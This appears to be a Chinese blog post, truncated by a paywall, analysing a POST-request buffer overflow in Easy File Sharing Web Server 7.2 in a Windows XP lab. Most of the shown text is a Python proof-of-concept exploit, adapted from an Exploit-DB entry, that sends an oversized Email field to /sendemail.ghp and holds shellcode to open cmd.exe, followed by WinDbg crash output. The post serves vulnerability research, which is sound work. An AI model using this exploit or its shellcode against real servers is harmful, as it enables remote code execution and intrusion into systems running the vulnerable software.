简介
看到这个软件,之前不是GET请求缓冲区溢出吗?
(附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749)
这次有个POST,看看有没有新鲜的东西啊!
参考:https://www.exploit-db.com/exploits/42165/
实验环境
WinXP sp3 中文版
EFS Web Server7.2
windbg
IDA
mona
python 2.7
漏洞分析
修改exp为poc:
import httplib
server = "127.0.0.1"
#Shellcode Open CMD.exe
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")
payload = "A" * 5000
# Server address and POrt
httpServ = httplib.HTTPConnection(server, 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % payload)
response = httpServ.getresponse()
httpServ.close()先复现一下:
0:005> g
(1110.1290): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000001 ecx=ffffffff edx=020561b8 esi=02056198 edi=020561b8
eip=61c277f6 esp=02056114 ebp=0205612c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
sqlite3!sqlite3_errcode+0x8e:
61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:0023:4141418d=????????一看跟上次的位置一样呀,都是sqlite3!sqlite3_errcode+0x8e
看下栈信息
0:005> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0205612c 61c6286c 000013ad 00001388 01568ea4 sqlite3!sqlite3_errcode+0x8e
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.ex
最低0.47元/天 解锁文章
扫一扫
4263